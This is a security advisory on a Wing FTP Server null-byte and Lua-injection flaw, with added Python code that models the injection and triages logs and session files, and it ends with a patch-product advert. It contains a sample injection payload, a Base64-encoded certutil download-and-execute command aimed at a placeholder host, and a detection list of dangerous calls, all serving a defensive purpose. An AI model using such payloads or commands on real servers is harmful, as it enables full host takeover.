A critical vulnerability in Wing FTP Server, CVE-2025-47812, is under active exploitation. It allows unauthenticated remote code execution as root on Linux or SYSTEM on Windows and carries a CVSS score of 10.0, the maximum severity.
Vulnerability Details
The vulnerability, identified as CVE-2025-47812, arises from improper handling of null bytes in Wing FTP Server's web interface, specifically in the loginok.html endpoint that processes authentication requests.
Wing FTP Server is a commercial file transfer solution widely used by businesses, MSPs, and hosting providers. It is available on Windows, Linux, and macOS.
Root Cause
CVE-2025-47812 combines a null-byte injection flaw with Lua code injection. The null byte lets a crafted username pass the authentication check, while the rest of that username is written unsanitized into a server-side Lua session file, where it is later interpreted as code. Together these allow attackers to bypass authentication and inject arbitrary commands into session files.
Proof of Concept (PoC)
Security researcher Julien Ahrens disclosed the vulnerability on June 30, 2025, together with two other Wing FTP Server vulnerabilities (CVE-2025-47811 and CVE-2025-47813), and published proof-of-concept exploits. Huntress Labs later built its own PoC demonstrating arbitrary code execution as root on Linux or SYSTEM on Windows. The PoC works as follows:
Login Request Exploit
- The attacker submits a POST request to loginok.html with a username that contains a %00 character followed by crafted Lua code.
- The %00 null byte truncates the string as far as the authentication check is concerned, while the trailing Lua payload closes the surrounding syntax and appends attacker-controlled code.
- The payload ends with -- (a Lua line comment) to neutralize whatever syntax follows it.
Session File Injection
- Wing FTP stores user session data (username, IP address, working directory) in .lua session files.
- The malformed username is written into this file verbatim, so the injected Lua ends up embedded in the session data as executable code rather than as a quoted string.
Triggering Code Execution
- When the server later loads the session for any session-reflecting endpoint (e.g., dir.html), it executes the poisoned session file as a Lua script.
- The attacker's code therefore runs with the privileges of the server process: root on Linux or SYSTEM on Windows.
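The three steps above describe one injection chain: a null byte that satisfies the authentication check, followed by Lua that breaks out of the session file's string literal. The following Python model, added for this article and not Wing FTP Server's code, reproduces that chain on a constructed session layout. The one-field-per-line Lua session format, the field names, the template and the deliberately benign payload (it calls os.execute('id'), nothing more) are assumptions chosen to show the mechanics. It shows what a NUL-terminated consumer sees, what the vulnerable writer emits, and how a writer that rejects control characters and quotes values the way Lua's string.format('%q') does keeps the same input inert.

```python
"""
Added model of the null-byte plus Lua-injection pattern described above.
Illustration code written for this article, not Wing FTP Server's source:
the session file layout, field names and payload are assumptions.
"""

# Assumed session layout: one Lua assignment per line, username spliced in raw.
SESSION_TEMPLATE = "user = '{username}'\nip = '{ip}'\ncwd = '/'\n"

# Calls that should never appear as executable code in a session file.
DANGEROUS = ("os.execute", "io.popen", "loadstring", "load(")


def auth_sees(raw_username: str) -> str:
    """A NUL-terminated (C-style) consumer stops at the first \\x00, so the
    authentication check only ever compares the prefix before the null byte."""
    return raw_username.split("\x00", 1)[0]


def build_session_vulnerable(raw_username: str, ip: str) -> str:
    """Vulnerable writer: the username is interpolated into Lua source verbatim."""
    return SESSION_TEMPLATE.format(username=raw_username, ip=ip)


def lua_quote(value: str) -> str:
    """Hardened helper: emit a Lua string literal the way string.format('%q')
    would, so quotes, backslashes, newlines and NULs stay inside the literal."""
    out = []
    for ch in value:
        if ch == "\\":
            out.append("\\\\")
        elif ch == '"':
            out.append('\\"')
        elif ch == "\n":
            out.append("\\n")
        elif ord(ch) < 0x20 or ch == "\x7f":
            out.append("\\%03d" % ord(ch))  # \000 for NUL, \013 for CR, ...
        else:
            out.append(ch)
    return '"' + "".join(out) + '"'


def build_session_hardened(raw_username: str, ip: str) -> str:
    """Hardened writer: reject control characters outright, then quote
    every field so the data can never become code."""
    if any(ord(c) < 0x20 or c == "\x7f" for c in raw_username):
        raise ValueError("control character in username")
    return "user = %s\nip = %s\ncwd = %s\n" % (
        lua_quote(raw_username), lua_quote(ip), lua_quote("/"))


def hardened_rejects(raw_username: str) -> bool:
    """True if the hardened writer refuses the username."""
    try:
        build_session_hardened(raw_username, "192.0.2.10")
        return False
    except ValueError:
        return True


def code_outside_strings(lua_src: str) -> list:
    """Tiny Lua lexer: drop string literals and '--' line comments, then
    report which DANGEROUS calls survive, i.e. what the interpreter would run."""
    kept, i, n = [], 0, len(lua_src)
    while i < n:
        ch = lua_src[i]
        if ch in "'\"":
            i += 1
            while i < n and lua_src[i] != ch:
                i += 2 if lua_src[i] == "\\" else 1  # skip escaped character
            i += 1                                    # closing quote
            kept.append(" ")
        elif lua_src.startswith("--", i):
            while i < n and lua_src[i] != "\n":
                i += 1
        else:
            kept.append(ch)
            i += 1
    code = "".join(kept)
    return [d for d in DANGEROUS if d in code]


# Constructed attacker username: a prefix the auth check accepts, a NUL, then
# Lua that closes the literal, runs a benign call, and comments out the rest.
PAYLOAD = "anonymous\x00'; os.execute('id') --"


def demo() -> dict:
    vulnerable = build_session_vulnerable(PAYLOAD, "192.0.2.10")
    return {
        "auth_sees": auth_sees(PAYLOAD),                          # 'anonymous'
        "vulnerable_runs": code_outside_strings(vulnerable),      # ['os.execute']
        "quoted_runs": code_outside_strings("user = " + lua_quote(PAYLOAD)),  # []
        "hardened_rejects": hardened_rejects(PAYLOAD),            # True
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", repr(value))
```

The two defences are independent: rejecting control characters blocks this specific bypass, while %q-style quoting is what stops any future username from turning into code. Production code should do both, and the session store should ideally not be a Lua source file at all.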
Observations & Artifacts
- Logs under Log/Domains/.../YYYY-M-D.log show truncated entries such as User 'anonymous with no closing quote: the null byte cut the logged username short, a telltale sign of this attack.
- The session directory contains unusual .lua files, typically oversized because of the injected code. On inspection they contain Base64-encoded payloads which, when decoded, launch commands such as downloading and executing binaries via certutil.
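The two artifacts above (truncated User ' log lines and bloated session .lua files carrying encoded commands) can be checked for mechanically. The triage script below is example code written for this article, not a Huntress or Wing FTP tool. The log lines and session file contents are constructed samples; the exact log format and session directory layout are assumptions, since the advisory gives only the Log/Domains/.../YYYY-M-D.log path pattern and the .lua suffix. The size threshold and the list of suspicious Lua calls are likewise assumptions a responder would tune to their environment.

```python
"""
Added triage helper for the CVE-2025-47812 artifacts described above.
Example code for this article; the log format, session layout, sample
lines and thresholds are constructed assumptions, not vendor data.
"""
import base64
import re

# Constructed sample log lines: two normal logins and one null-byte-truncated entry.
SAMPLE_LOG = [
    "[2025-07-01 10:02:11] 203.0.113.5 User 'alice' logged in",
    "[2025-07-01 10:03:40] 198.51.100.7 User 'anonymous",
    "[2025-07-01 10:04:02] 203.0.113.5 User 'bob' logged in",
]

# A User '<name> entry whose opening quote is never closed on that line.
TRUNCATED_USER = re.compile(r"User '([^']*)$")

# Strings that have no business in a session file, raw or after decoding.
SUSPICIOUS_LUA = ("os.execute", "io.popen", "loadstring",
                  "certutil", "powershell", "cmd.exe")
SIZE_THRESHOLD = 1024   # bytes; assumed well above a legitimate session file
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Constructed session files. The Base64 blob encodes a placeholder certutil
# command pointing at a reserved .invalid domain, not a real download.
BENIGN_SESSION = "user = 'alice'\nip = '203.0.113.5'\ncwd = '/'\n"
ENCODED_CMD = base64.b64encode(
    b"certutil -urlcache -f http://example.invalid/x.exe x.exe").decode()
MALICIOUS_SESSION = (
    "user = 'anonymous\x00'; os.execute(decode('" + ENCODED_CMD + "')) --'\n"
    "ip = '198.51.100.7'\ncwd = '/'\n")


def find_truncated_logins(lines):
    """Return (line, username) pairs for log entries cut off by a null byte."""
    hits = []
    for line in lines:
        m = TRUNCATED_USER.search(line.rstrip("\r\n"))
        if m:
            hits.append((line, m.group(1)))
    return hits


def decode_b64_blobs(text):
    """Decode every long Base64 run so the analyst sees the real command."""
    out = []
    for blob in B64_BLOB.findall(text):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
    return out


def triage_session_file(name, content):
    """Flag one session .lua file by size, dangerous calls and decoded Base64."""
    reasons = []
    if len(content.encode("utf-8", "replace")) > SIZE_THRESHOLD:
        reasons.append("oversized")
    for needle in SUSPICIOUS_LUA:
        if needle in content:
            reasons.append("contains " + needle)
    decoded = decode_b64_blobs(content)
    for text in decoded:
        for needle in SUSPICIOUS_LUA:
            if needle in text:
                reasons.append("base64 decodes to " + needle)
    return {"file": name, "suspicious": bool(reasons),
            "reasons": reasons, "decoded": decoded}


def run_triage():
    """Run both checks over the constructed samples and return the findings."""
    sessions = {"sess_alice.lua": BENIGN_SESSION, "sess_anon.lua": MALICIOUS_SESSION}
    return {
        "truncated_logins": find_truncated_logins(SAMPLE_LOG),
        "sessions": [triage_session_file(n, c) for n, c in sessions.items()],
    }


if __name__ == "__main__":
    result = run_triage()
    for line, user in result["truncated_logins"]:
        print("TRUNCATED LOGIN:", repr(user), "<-", line)
    for s in result["sessions"]:
        print(s["file"], "suspicious" if s["suspicious"] else "clean", s["reasons"])
```

To use it on a real host, replace SAMPLE_LOG with the lines of the relevant Log/Domains/.../YYYY-M-D.log files and feed each file in the session directory through triage_session_file. A truncated User ' line on its own is only a lead; a session file that decodes to a download-and-execute command is the confirmation.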
Impact & Exploit Potential
Successful exploitation of CVE-2025-47812 lets an attacker inject Lua code into session files, which the server later executes with elevated privileges. This gives the attacker complete control of the host, and the attack can be carried out through an anonymous FTP account where anonymous login is enabled. According to Censys, approximately 8,103 devices are running Wing FTP Server, with around 5,004 exposing their web interfaces to the internet.
Tactics, Techniques, and Procedures (TTPs)
The following TTPs are associated with the exploitation of CVE-2025-47812:
TA0002 – Execution: Attackers inject arbitrary Lua code to execute commands with root or SYSTEM privileges.
TA0003 – Persistence: Attackers may create new user accounts for persistent access.
T1190 – Exploit Public-Facing Application: Exploit the vulnerable web interface to execute malicious code on the server.
T1136 – Create Account: Attackers create new accounts to maintain access to the compromised system.
Affected Products
The vulnerability affects the following products:
- Wing FTP Server 7.4.3 and earlier (all versions before 7.4.4), on Windows, Linux, and macOS
Mitigation & Recommendations
To mitigate the risk posed by CVE-2025-47812, apply the following measures:
- Upgrade to Wing FTP Server version 7.4.4 or later.
- Disable or restrict HTTP/HTTPS access to the Wing FTP web portal.
- Disable anonymous login functionality.
- Monitor session directories for unusual or oversized .lua files, and check domain logs for truncated User ' entries.
- Implement network segmentation to limit exposure.
Active Exploitation
Huntress Labs observed active exploitation of this vulnerability starting on July 1, 2025, the day after public disclosure.
Observed attacker activity included reconnaissance, system enumeration, user creation, and attempts to download and execute remote malware.
Instantly Fix Risks with Saner Patch Management
Saner patch management is a continuous, automated, and integrated patching platform that fixes risks being exploited in the wild. It supports major operating systems such as Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.